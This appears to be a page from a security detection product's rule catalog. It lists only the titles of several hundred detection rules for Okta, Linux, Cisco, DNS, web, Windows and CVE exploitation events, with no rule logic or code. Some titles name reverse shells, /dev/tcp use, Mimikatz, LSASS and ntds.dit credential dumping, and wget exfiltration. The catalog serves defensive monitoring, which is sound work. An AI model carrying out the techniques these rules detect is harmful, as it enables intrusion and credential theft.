  • Okta Policy Modified or Deleted
  • Okta Security Threat Detected
  • Okta Suspicious Activity Reported by End-user
  • Okta Unauthorized Access to App
  • Okta User Account Locked Out
  • New Okta User Created
  • Okta User Session Start Via An Anonymising Proxy Service
  • OneLogin User Assumed Another User
  • OneLogin User Account Locked
  • Default Credentials Usage
  • Host Without Firewall
  • Cleartext Protocol Usage Via Netflow
  • Audio Capture
  • Auditing Configuration Changes on Linux Host
  • Binary Padding - Linux
  • BPFDoor Abnormal Process ID or Lock File Accessed
  • Bpfdoor TCP Ports Redirect
  • Linux Capabilities Discovery
  • File Time Attribute Change - Linux
  • Remove Immutable File Attribute - Auditd
  • Clipboard Collection with Xclip Tool - Auditd
  • Clipboard Collection of Image Data with Xclip Tool
  • Possible Coin Miner CPU Priority Param
  • Creation Of An User Account
  • Data Compressed
  • Data Exfiltration with Wget
  • Overwriting the File with Dev Zero or Null
  • Disable System Firewall
  • File or Folder Permissions Change
  • Credentials In Files - Linux
  • Use Of Hidden Paths Or Files
  • Hidden Files and Directories
  • Steganography Hide Zip Information in Picture File
  • Linux Keylogging with Pam.d
  • Modification of ld.so.preload
  • Loading of Kernel Module via Insmod
  • Logging Configuration Changes on Linux Host
  • Masquerading as Linux Crond Process
  • Modify System Firewall
  • Linux Network Service Scanning - Auditd
  • Network Sniffing - Linux
  • Password Policy Discovery - Linux
  • Systemd Service Reload or Start
  • Screen Capture with Import Tool
  • Screen Capture with Xwd
  • Split A File Into Pieces - Linux
  • Steganography Hide Files with Steghide
  • Steganography Extract Files with Steghide
  • Suspicious C2 Activities
  • Suspicious Commands Linux
  • Program Executions in Suspicious Folders
  • Suspicious History File Operations - Linux
  • Systemd Service Creation
  • System Information Discovery - Auditd
  • System and Hardware Information Discovery
  • System Shutdown/Reboot - Linux
  • Unix Shell Configuration Modification
  • Steganography Unzip Hidden Information From Picture File
  • System Owner or User Discovery - Linux
  • Webshell Remote Command Execution
  • Equation Group Indicators
  • Buffer Overflow Attempts
  • Commands to Clear or Remove the Syslog - Builtin
  • Remote File Copy
  • Code Injection by ld.so Preload
  • Nimbuspwn Exploitation
  • Potential Suspicious BPF Activity - Linux
  • Shellshock Expression
  • Privileged User Has Been Created
  • Linux Command History Tampering
  • Suspicious Activity in Shell Commands
  • Suspicious Log Entries
  • Suspicious Reverse Shell Command Line
  • Space After Filename
  • Suspicious Use of /dev/tcp
  • JexBoss Command Sequence
  • Symlink Etc Passwd
  • PwnKit Local Privilege Escalation
  • Relevant ClamAV Message
  • Modifying Crontab
  • Guacamole Two Users Sharing Session Anomaly
  • SSHD Error Message CVE-2018-15473
  • Suspicious OpenSSH Daemon Error
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin
  • Disabling Security Tools - Builtin
  • Suspicious Named Error
  • Suspicious VSFTPD Error Messages
  • Cisco Clear Logs
  • Cisco Collect Data
  • Cisco Crypto Commands
  • Cisco Disabling Logging
  • Cisco Discovery
  • Cisco Denial of Service
  • Cisco File Deletion
  • Cisco Show Commands Input
  • Cisco Local Accounts
  • Cisco Modify Configuration
  • Cisco Stage Data
  • Cisco Sniffing
  • Cisco BGP Authentication Failures
  • Cisco LDP Authentication Failures
  • DNS Query to External Service Interaction Domains
  • Cobalt Strike DNS Beaconing
  • Monero Crypto Coin Mining Pool Lookup
  • Suspicious DNS Query with B64 Encoded String
  • Telegram Bot API Request
  • DNS TXT Answer with Possible Execution Strings
  • Wannacry Killswitch Domain
  • Cleartext Protocol Usage
  • Huawei BGP Authentication Failures
  • Juniper BGP Missing MD5
  • MITRE BZAR Indicators for Execution
  • MITRE BZAR Indicators for Persistence
  • Potential PetitPotam Attack Via EFS RPC Calls
  • Possible PrintNightmare Print Driver Install
  • SMB Spoolss Name Piped Usage
  • Default Cobalt Strike Certificate
  • DNS Events Related To Mining Pools
  • New Kind of Network (NKN) Detection
  • Suspicious DNS Z Flag Bit Set
  • DNS TOR Proxies
  • Executable from Webdav
  • OMIGOD HTTP No Authentication RCE
  • WebDav Put Request
  • Publicly Accessible RDP Service
  • Remote Task Creation via ATSVC Named Pipe - Zeek
  • Possible Impacket SecretDump Remote Activity - Zeek
  • First Time Seen Remote Named Pipe - Zeek
  • Suspicious PsExec Execution - Zeek
  • Suspicious Access to Sensitive File Extensions - Zeek
  • Transferring Files with Credential Data via Network Shares - Zeek
  • Kerberos Network Traffic RC4 Ticket Encryption
  • Apache Segmentation Fault
  • Apache Threading Error
  • Nginx Core Dump
  • Download from Suspicious Dyndns Hosts
  • Windows WebDAV User Agent
  • Download From Suspicious TLD - Blacklist
  • Download From Suspicious TLD - Whitelist
  • F5 BIG-IP iControl Rest API Command Execution - Proxy
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy
  • HackTool - BabyShark Agent Default URL Pattern
  • HackTool - Empire UserAgent URI Combo
  • PUA - Advanced IP/Port Scanner Update Check
  • PwnDrp Access
  • Raw Paste Service Access
  • Flash Player Update from Suspicious Location
  • Suspicious Network Communication With IPFS
  • Telegram API Access
  • APT User Agent
  • Suspicious Base64 Encoded User-Agent
  • Bitsadmin to Uncommon IP Server Address
  • Bitsadmin to Uncommon TLD
  • Crypto Miner User Agent
  • HTTP Request With Empty User Agent
  • Exploit Framework User Agent
  • Hack Tool User Agent
  • Malware User Agent
  • Windows PowerShell User Agent
  • Rclone Activity via Proxy
  • Suspicious User Agent
  • Potential Base64 Encoded User-Agent
  • Suspicious External WebDAV Execution
  • F5 BIG-IP iControl Rest API Command Execution - Webserver
  • Successful IIS Shortname Fuzzing Scan
  • Java Payload Strings
  • JNDIExploit Pattern
  • Path Traversal Exploitation Attempts
  • Source Code Enumeration Detection by Keyword
  • SQL Injection Strings In URI
  • Server Side Template Injection Strings
  • Suspicious User-Agents Related To Recon Tools
  • Suspicious Windows Strings In URI
  • Webshell ReGeorg Detection Via Web Logs
  • Windows Webshell Strings
  • Cross Site Scripting Strings
  • Mimikatz Use
  • Microsoft Malware Protection Engine Crash
  • Potential Credential Dumping Via WER - Application
  • Ntdsutil Abuse
  • Dump Ntds.dit To Suspicious Location
  • Audit CVE Event
  • Backup Catalog Deleted
  • Application Uninstalled
  • Restricted Software Access By SRP
  • MSI Installation From Suspicious Locations
  • MSI Installation From Web
  • Atera Agent Installation
  • MSSQL Add Account To Sysadmin Role
  • MSSQL Disable Audit Settings
  • MSSQL Server Failed Logon
  • MSSQL Server Failed Logon From External Network
  • MSSQL SPProcoption Set
  • MSSQL XPCmdshell Suspicious Execution
  • MSSQL XPCmdshell Option Change
  • Relevant Anti-Virus Signature Keywords In Application Log
  • Remote Access Tool - ScreenConnect Command Execution
  • Remote Access Tool - ScreenConnect File Transfer
  • Microsoft Malware Protection Engine Crash - WER
  • File Was Not Allowed To Run
  • Sysinternals Tools AppX Versions Execution
  • Deployment AppX Package Was Blocked By AppLocker
  • Potential Malicious AppX Package Installation Attempts
  • Deployment Of The AppX Package Was Blocked By The Policy
  • Suspicious AppX Package Installation Attempt
  • Suspicious Remote AppX Package Locations
  • Suspicious AppX Package Locations
  • Uncommon AppX Package Locations
  • Suspicious Digital Signature Of AppX Package
  • New BITS Job Created Via Bitsadmin
  • New BITS Job Created Via PowerShell
  • BITS Transfer Job Downloading File Potential Suspicious Extension
  • BITS Transfer Job Download From File Sharing Domains
  • BITS Transfer Job Download From Direct IP
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD
  • BITS Transfer Job Download To Potential Suspicious Folder
  • Certificate Private Key Acquired
  • Certificate Exported From Local Certificate Store
  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation
  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate
  • CodeIntegrity - Revoked Kernel Driver Loaded
  • CodeIntegrity - Blocked Image Load With Revoked Certificate
  • CodeIntegrity - Revoked Image Loaded
  • CodeIntegrity - Unsigned Kernel Module Loaded
  • CodeIntegrity - Unsigned Image Loaded
  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module
  • Loading Diagcab Package From Remote Path
  • DNS Query for Anonfiles.com Domain - DNS Client
  • DNS Query To MEGA Hosting Website - DNS Client
  • DNS Query To Put.io - DNS Client
  • Query Tor Onion Address - DNS Client
  • DNS Query To Ufile.io - DNS Client
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client
  • Failed DNS Zone Transfer
  • DNS Server Error Failed Loading the ServerLevelPluginDLL
  • USB Device Plugged
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE
  • All Rules Have Been Deleted From The Windows Firewall Configuration
  • A Rule Has Been Deleted From The Windows Firewall Exception List
  • The Windows Defender Firewall Service Failed To Load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration
  • Windows Firewall Settings Have Been Changed
  • ETW Logging/Processing Option Disabled On IIS Server
  • HTTP Logging Disabled On IIS Server
  • New Module Module Added To IIS Server
  • Previously Installed IIS Module Was Removed
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP
  • Standard User In High Privileged Group
  • ProxyLogon MSExchange OabVirtualDirectory
  • Mailbox Export to Exchange Webserver
  • Certificate Request Export to Exchange Webserver
  • Remove Exported Mailbox from Exchange Webserver
  • Exchange Set OabVirtualDirectory ExternalUrl Property
  • MSExchange Transport Agent Installation - Builtin
  • Failed MSExchange Transport Agent Installation
  • NTLM Logon
  • NTLM Brute Force
  • Potential Remote Desktop Connection to Non-Domain Host
  • OpenSSH Server Listening On Socket
  • Azure AD Health Monitoring Agent Registry Keys Access
  • Azure AD Health Service Agents Registry Keys Access
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right
  • AD Privileged Users or Groups Reconnaissance
  • ADCS Certificate Template Configuration Vulnerability
  • ADCS Certificate Template Configuration Vulnerability with Risky EKU
  • Add or Remove Computer from DC
  • Access To ADMIN$ Network Share
  • AD Object WriteDAC Access
  • Active Directory Replication from Non Machine Account
  • Potential AD User Enumeration From Non-Machine Account
  • Enabled User Right in AD to Control User Objects
  • Active Directory User Backdoors
  • Weak Encryption Enabled and Kerberoast
  • Hacktool Ruler
  • Remote Task Creation via ATSVC Named Pipe
  • Security Eventlog Cleared
  • Processes Accessing the Microphone and Webcam
  • Failed Code Integrity Checks
  • CobaltStrike Service Installations - Security
  • DCERPC SMB Spoolss Named Pipe
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security
  • Mimikatz DC Sync
  • Device Installation Blocked
  • Windows Event Auditing Disabled
  • Important Windows Event Auditing Disabled
  • ETW Logging Disabled In .NET Processes - Registry
  • DPAPI Domain Backup Key Extraction
  • DPAPI Domain Master Key Backup Attempt
  • External Disk Drive Or USB Storage Device Was Recognized By The System
  • Persistence and Execution at Scale via GPO Scheduled Task
  • Hidden Local User Creation
  • HackTool - EDRSilencer Execution - Filter Added
  • HackTool - NoFilter Execution
  • HybridConnectionManager Service Installation
  • Impacket PsExec Execution
  • Possible Impacket SecretDump Remote Activity
  • Invoke-Obfuscation CLIP+ Launcher - Security
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security
  • Invoke-Obfuscation STDIN+ Launcher - Security
  • Invoke-Obfuscation VAR+ Launcher - Security
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security
  • Invoke-Obfuscation Via Stdin - Security
  • Invoke-Obfuscation Via Use Clip - Security
  • Invoke-Obfuscation Via Use MSHTA - Security
  • Invoke-Obfuscation Via Use Rundll32 - Security
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security
  • ISO Image Mounted
  • Kerberoasting Activity - Initial Query
  • First Time Seen Remote Named Pipe
  • LSASS Access From Non System Account
  • Credential Dumping Tools Service Execution - Security
  • WCE wceaux.dll Access
  • Metasploit SMB Authentication
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security
  • NetNTLM Downgrade Attack
  • Windows Network Access Suspicious desktop.ini Action
  • New or Renamed User Account with '$' Character
  • Denied Access To Remote Desktop
  • Password Policy Enumerated
  • Windows Pcap Drivers
  • Possible PetitPotam Coerce Authentication Attempt
  • PetitPotam Suspicious Kerberos TGT Request
  • Possible DC Shadow Attack
  • PowerShell Scripts Installed as Services - Security
  • Protected Storage Service Access
  • RDP over Reverse SSH Tunnel WFP
  • Register new Logon Process by Rubeus
  • Service Registry Key Read Access Request
  • Remote PowerShell Sessions Network Connections (WinRM)
  • Replay Attack Detected
  • SAM Registry Hive Handle Request
  • SCM Database Handle Failure
  • SCM Database Privileged Operation
  • Potential Secure Deletion with SDelete
  • Service Installed By Unusual Client - Security
  • Remote Access Tool Services Have Been Installed - Security
  • SMB Create Remote File Admin Share
  • A New Trust Was Created To A Domain
  • Win Susp Computer Name Containing Samtheadmin
  • Addition of SID History to Active Directory Object
  • Password Change on Directory Service Restore Mode (DSRM) Account
  • Account Tampering - Suspicious Failed Logon Reasons
  • Group Policy Abuse for Privilege Addition
  • Startup/Logon Script Added to Group Policy Object
  • Kerberos Manipulation
  • Suspicious LDAP-Attributes Used
  • Suspicious Windows ANONYMOUS LOGON Local Account Created
  • Password Dumper Activity on LSASS
  • Suspicious Remote Logon with Explicit Credentials
  • Potentially Suspicious AccessMask Requested From LSASS
  • Reconnaissance Activity
  • Password Protected ZIP File Opened
  • Password Protected ZIP File Opened (Suspicious Filenames)
  • Password Protected ZIP File Opened (Email Attachment)
  • Uncommon Outbound Kerberos Connection - Security
  • Possible Shadow Credentials Added
  • Suspicious PsExec Execution
  • Suspicious Access to Sensitive File Extensions
  • Suspicious Kerberos RC4 Ticket Encryption
  • Suspicious Scheduled Task Creation
  • Important Scheduled Task Deleted/Disabled
  • Suspicious Scheduled Task Update
  • Unauthorized System Time Modification
  • Remote Service Activity via SVCCTL Named Pipe
  • SysKey Registry Keys Access
  • Sysmon Channel Reference Deletion
  • Tap Driver Installation - Security
  • Suspicious Teams Application Related ObjectAcess Event
  • Transferring Files with Credential Data via Network Shares
  • User Added to Local Administrator Group
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
  • Local User Creation
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege
  • User Logoff Event
  • VSSAudit Security Event Source Registration
  • Windows Defender Exclusion List Modified
  • Windows Defender Exclusion Deleted
  • T1047 Wmiprvse Wbemcomn DLL Hijack
  • Locked Workstation
  • WMI Persistence - Security
  • Windows Defender Exclusion Registry Key - Write Access Requested
  • Admin User Remote Logon
  • DiagTrackEoP Default Login Username
  • A Member Was Removed From a Security-Enabled Global Group
  • Potential Access Token Abuse
  • RDP Login from Localhost
  • Successful Overpass the Hash Attempt
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln
  • A Member Was Added to a Security-Enabled Global Group
  • A Security-Enabled Global Group Was Deleted
  • External Remote RDP Logon from Public IP
  • Pass the Hash Activity 2
  • External Remote SMB Logon from Public IP
  • Failed Logon From Public IP
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP
  • Outgoing Logon with New Credentials
  • RottenPotato Like Attack Pattern
  • Successful Account Login Via WMI
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary
  • Microsoft Defender Blocked from Loading Unsigned DLL
  • Unsigned Binary Loaded From Suspicious Location
  • HybridConnectionManager Service Running
  • Suspicious Application Installed
  • Suspicious Rejected SMB Guest Logon From IP
  • Sysmon Application Crashed
  • NTLMv1 Logon Between Client and Server
  • Active Directory Certificate Services Denied Certificate Enrollment Request
  • DHCP Server Error Failed Loading the CallOut DLL
  • DHCP Server Loaded the CallOut DLL
  • Potential CVE-2021-42287 Exploitation Attempt
  • Local Privilege Escalation Indicator TabTip
  • Eventlog Cleared
  • Important Windows Eventlog Cleared
  • KDC RC4-HMAC Downgrade CVE-2022-37966
  • Certificate Use With No Strong Mapping
  • No Suitable Encryption Key Found For Generating Kerberos Ticket
  • Critical Hive In Suspicious Location Access Bits Cleared
  • Volume Shadow Copy Mount
  • Suspicious Usage of CVE_2021_34484 or CVE 2022_21919
  • Windows Update Error
  • Zerologon Exploitation Using Well-known Tools
  • Vulnerable Netlogon Secure Channel Connection Allowed
  • NTFS Vulnerability Exploitation
  • Windows Defender Threat Detection Service Disabled
  • CobaltStrike Service Installations - System
  • smbexec.py Service Installation
  • Invoke-Obfuscation CLIP+ Launcher - System
  • Invoke-Obfuscation Obfuscated IEX Invocation - System
  • Invoke-Obfuscation STDIN+ Launcher - System
  • Invoke-Obfuscation VAR+ Launcher - System
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System
  • Invoke-Obfuscation Via Stdin - System
  • Invoke-Obfuscation RUNDLL LAUNCHER - System
  • Invoke-Obfuscation Via Use Clip - System
  • Invoke-Obfuscation Via Use MSHTA - System
  • Invoke-Obfuscation Via Use Rundll32 - System
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System
  • KrbRelayUp Service Installation
  • Credential Dumping Tools Service Execution - System
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System
  • Moriya Rootkit - System
  • PowerShell Scripts Installed as Services
  • Anydesk Remote Access Software Service Installation
  • CSExec Service Installation
  • HackTool Service Registration or Execution
  • Mesh Agent Service Installation
  • NetSupport Manager Service Install
  • PAExec Service Installation
  • New PDQDeploy Service - Server Side
  • New PDQDeploy Service - Client Side
  • ProcessHacker Privilege Elevation
  • RemCom Service Installation
  • Remote Access Tool Services Have Been Installed - System
  • Remote Utilities Host Service Install
  • Sliver C2 Default Service Installation
  • Service Installed By Unusual Client - System
  • Suspicious Service Installation
  • PsExec Service Installation
  • Tap Driver Installation
  • TacticalRMM Service Installation
  • Uncommon Service Installation Image Path
  • Important Windows Service Terminated With Error
  • Windows Service Terminated With Error
  • Important Windows Service Terminated Unexpectedly
  • RTCore Suspicious Service Installation
  • Service Installation in Suspicious Folder
  • Service Installation with Suspicious Folder Pattern
  • Suspicious Service Installation Script
  • Potential RDP Exploit CVE-2019-0708
  • Scheduled Task Executed From A Suspicious Location
  • Scheduled Task Executed Uncommon LOLBIN
  • Important Scheduled Task Deleted
  • Ngrok Usage with Remote Desktop Service
  • Windows Defender Grace Period Expired
  • LSASS Access Detected via Attack Surface Reduction
  • PSExec and WMI Process Creations Block
  • Windows Defender Exclusions Added
  • Windows Defender Exploit Guard Tamper
  • Windows Defender Submit Sample Feature Disabled
  • Windows Defender Malware And PUA Scanning Disabled
  • Windows Defender Malware Detection History Deletion
  • Windows Defender AMSI Trigger Detected
  • Windows Defender Real-time Protection Disabled
  • Windows Defender Real-Time Protection Failure/Restart
  • Win Defender Restored Quarantine File
  • Windows Defender Configuration Changes
  • Microsoft Defender Tamper Protection Trigger
  • Windows Defender Threat Detected
  • Windows Defender Virus Scanning Feature Disabled
  • WMI Persistence
  • Potential RemoteFXvGPUDisablement.EXE Abuse
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell
  • Suspicious Non PowerShell WSMAN COM Provider
  • Sysmon Configuration Change
  • Sysmon Blocked Executable
  • Sysmon Blocked File Shredding
  • Sysmon File Executable Creation Detected
  • Rejetto HTTP File Server RCE
  • CVE-2010-5278 Exploitation Attempt
  • CosmicDuke Service Installation
  • StoneDrill Service Install
  • Equation Group C2 Communication
  • Turla Service Install
  • Turla PNG Dropper Service
  • Fortinet CVE-2018-13379 Exploitation
  • Oracle WebLogic Exploit
  • OilRig APT Schedule Task Persistence - Security
  • OilRig APT Schedule Task Persistence - System
  • Defrag Deactivation - Security
  • Pulse Secure Attack CVE-2019-11510
  • Citrix Netscaler Attack CVE-2019-19781
  • Confluence Exploitation CVE-2019-3398
  • Chafer Malware URL Pattern
  • Ursnif Malware C2 URL Pattern
  • Ursnif Malware Download URL Pattern
  • APT40 Dropbox Tool User Agent
  • Operation Wocao Activity - Security
  • CVE-2020-0688 Exploitation Attempt
  • CVE-2020-0688 Exchange Exploitation via Web Log
  • CVE-2020-0688 Exploitation via Eventlog
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195
  • ComRAT Network Communication
  • TerraMaster TOS CVE-2020-28188
  • Cisco ASA FTD Exploit CVE-2020-3452
  • Oracle WebLogic Exploit CVE-2020-14882
  • GALLIUM Artefacts - Builtin
  • Solarwinds SUPERNOVA Webshell Access
  • Arcadyan Router Exploitations
  • Possible Exploitation of Exchange RCE CVE-2021-42321
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
  • Possible CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation IPC Access
  • Oracle WebLogic Exploit CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation
  • CVE-2021-21978 Exploitation Attempt
  • VMware vCenter Server File Upload CVE-2021-22005
  • Fortinet CVE-2021-22123 Exploitation
  • Pulse Connect Secure RCE Attack CVE-2021-22893
  • Potential CVE-2021-26084 Exploitation Attempt
  • Exploitation of CVE-2021-26814 in Wazuh
  • ProxyLogon Reset Virtual Directories Based On IIS Log
  • Potential CVE-2021-27905 Exploitation Attempt
  • Exchange Exploitation CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation
  • ADSelfService Exploitation
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit
  • LPE InstallerFileTakeOver PoC CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt
  • Sitecore Pre-Auth RCE CVE-2021-42237
  • Potential CVE-2021-42278 Exploitation Attempt
  • Suspicious Computer Account Name Change CVE-2021-42287
  • Grafana Path Traversal Exploitation CVE-2021-43798
  • Log4j RCE CVE-2021-44228 Generic
  • Log4j RCE CVE-2021-44228 in Fields
  • Exchange ProxyShell Pattern
  • Successful Exchange ProxyShell Attack
  • SonicWall SSL/VPN Jarrewrite Exploitation
  • Devil Bait Potential C2 Communication Traffic
  • Goofy Guineapig Backdoor Potential C2 Communication
  • Goofy Guineapig Backdoor Service Creation
  • Small Sieve Malware Potential C2 Communication
  • Exchange Exploitation Used by HAFNIUM
  • DEWMODE Webshell Access
  • Potential CVE-2022-21587 Exploitation Attempt
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE
  • CVE-2022-31659 VMware Workspace ONE Access RCE
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass
  • Apache Spark Shell Command Injection - Weblogs
  • Atlassian Bitbucket Command Injection Via Archive API
  • Potential OWASSRF Exploitation Attempt - Proxy
  • OWASSRF Exploitation Attempt Using Public POC - Proxy
  • Potential OWASSRF Exploitation Attempt - Webserver
  • OWASSRF Exploitation Attempt Using Public POC - Webserver
  • Exploitation Indicator Of CVE-2022-42475
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt
  • MSSQL Extended Stored Procedure Backdoor Maggie
  • BlueSky Ransomware Artefacts
  • MSMQ Corrupted Packet Encountered
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21
  • Exploitation Indicators Of CVE-2023-20198
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)
  • Potential CVE-2023-2283 Exploitation
  • CVE-2023-23397 Exploitation Attempt
  • Potential CVE-2023-23397 Exploitation Attempt - SMB
  • Potential CVE-2023-23752 Exploitation Attempt
  • Potential CVE-2023-25157 Exploitation Attempt
  • Potential CVE-2023-25717 Exploitation Attempt
  • Potential CVE-2023-27997 Exploitation Indicators
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
  • Potential CVE-2023-36884 Exploitation Pattern
  • Potential CVE-2303-36884 URL Request Pattern Traffic
  • Potential CVE-2023-36884 Exploitation - File Downloads
  • Potential CVE-2023-36884 Exploitation - URL Marker
  • Potential CVE-2023-36884 Exploitation - Share Access
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web
  • Potential CVE-2023-46214 Exploitation Attempt
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
  • CVE-2023-46747 Exploitation Activity - Proxy
  • CVE-2023-46747 Exploitation Activity - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • COLDSTEEL Persistence Service Creation
  • SNAKE Malware Service Persistence
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy
  • Potential Compromised 3CXDesktopApp ICO C2 File Download
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
  • Diamond Sleet APT Scheduled Task Creation
  • Potential Operation Triangulation C2 Beaconing Activity - DNS
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy
  • Okta 2023 Breach Indicator Of Compromise
  • Potential Peach Sandstorm APT C2 Communication Activity
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation
  • ScreenConnect User Database Modification - Security
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare
  • Kapeka Backdoor Scheduled Task Creation
  • Account Created And Deleted By Non Approved Users
  • Authentication Occuring Outside Normal Business Hours
  • Privilege Role Elevation Not Occuring on SAW or PAW
  • Privilege Role Sign-In Outside Expected Controls
  • Privilege Role Sign-In Outside Of Normal Hours
  • User with Privileges Logon
  • Potential Zerologon (CVE-2020-1472) Exploitation
  • Potential Pass the Hash Activity
  • Remote Registry Management Using Reg Utility
  • Interactive Logon to Server Systems
  • Mail Forwarding/Redirecting Activity In O365
  • Okta Password Health Report Query
  • .Class Extension URI Ending Request
  • Firewall Rule Modified In The Windows Firewall Exception List
  • Access To Browser Credential Files By Uncommon Applications - Security
  • Scheduled Task Deletion
  • Potential Remote WMI ActiveScriptEventConsumers Activity
  • AWS EC2 Download Userdata
  • Potential Backup Enumeration on AWS
  • Account Enumeration on AWS
  • Potential Network Enumeration on AWS
  • Potential Storage Enumeration on AWS
  • AWS Lambda Function Created or Invoked
  • AWS Macie Evasion
  • Potential AWS Cloud Email Service Abuse
  • Sign-in Failure Bad Password Threshold
  • CVE-2021-3156 Exploitation Attempt
  • CVE-2021-3156 Exploitation Attempt Bruteforcing
  • Potential CVE-2021-4034 Exploitation Attempt
  • Use of Debugfs to Access a Raw Disk
  • OMIGOD SCX RunAsProvider ExecuteScript
  • Failed Logins with Different Accounts from Single Source - Linux
  • Privilege Escalation Preparation
  • Possible DNS Tunneling
  • High DNS Bytes Out
  • High NULL Records Requests Rate
  • High DNS Requests Rate
  • High DNS subdomain requests rate per domain
  • High TXT Records Requests Rate
  • Large domain name request
  • High DNS Bytes Out - Firewall
  • High DNS Requests Rate - Firewall
  • Network Scans Count By Destination IP
  • Possible DNS Rebinding
  • Network Scans Count By Destination Port
  • Multiple Modsecurity Blocks
  • Multiple Suspicious Resp Codes Caused by Single Client
  • Stored Credentials in Fake Files
  • Dumping ntds.dit remotely via DCSync
  • Dumping ntds.dit remotely via NetSync
  • Malicious Service Installations
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Remote Schtasks Creation
  • Enumeration via the Global Catalog
  • Rare Schtasks Creations
  • Password Spraying via Explicit Credentials
  • Multiple Users Failing to Authenticate from Single Process
  • Failed Logins with Different Accounts from Single Source System
  • Failed NTLM Logins with Different Accounts from Single Source System
  • Valid Users Failing to Authenticate From Single Source Using Kerberos
  • Disabled Users Failing To Authenticate From Source Using Kerberos
  • Invalid Users Failing To Authenticate From Source Using Kerberos
  • Valid Users Failing to Authenticate from Single Source Using NTLM
  • Invalid Users Failing To Authenticate From Single Source Using NTLM
  • Multiple Users Remotely Failing To Authenticate From Single Source
  • Suspicious Multiple File Rename Or Delete Occurred
  • Possible Remote Password Change Through SAMR
  • Failed Mounting of Hidden Share
  • Rare Service Installations
  • Rare Scheduled Task Creations
  • Domain User Enumeration Network Recon 01
  • Potential Exfiltration of Compressed Files
windows-registry_set 215
Show Rules (215)
  • Abusing Windows Telemetry For Persistence - Registry
  • User Account Hidden By Registry
  • Service Binary in Uncommon Folder
  • Disable Microsoft Office Security Features
  • Adwind RAT / JRAT - Registry
  • Office Security Settings Changed
  • Potential Persistence Via COM Hijacking From Suspicious Locations
  • Potential Persistence Via COM Search Order Hijacking
  • SilentProcessExit Monitor Registration
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
  • Registry Persistence via Service in Safe Mode
  • Add Port Monitor Persistence in Registry
  • Add Debugger Entry To AeDebug For Persistence
  • Allow RDP Remote Assistance Feature
  • Potential AMSI COM Server Hijacking
  • CurrentVersion Autorun Keys Modification
  • Common Autorun Keys Modification
  • Classes Autorun Keys Modification
  • CurrentControlSet Autorun Keys Modification
  • CurrentVersion NT Autorun Keys Modification
  • Internet Explorer Autorun Keys Modification
  • Office Autorun Keys Modification
  • Session Manager Autorun Keys Modification
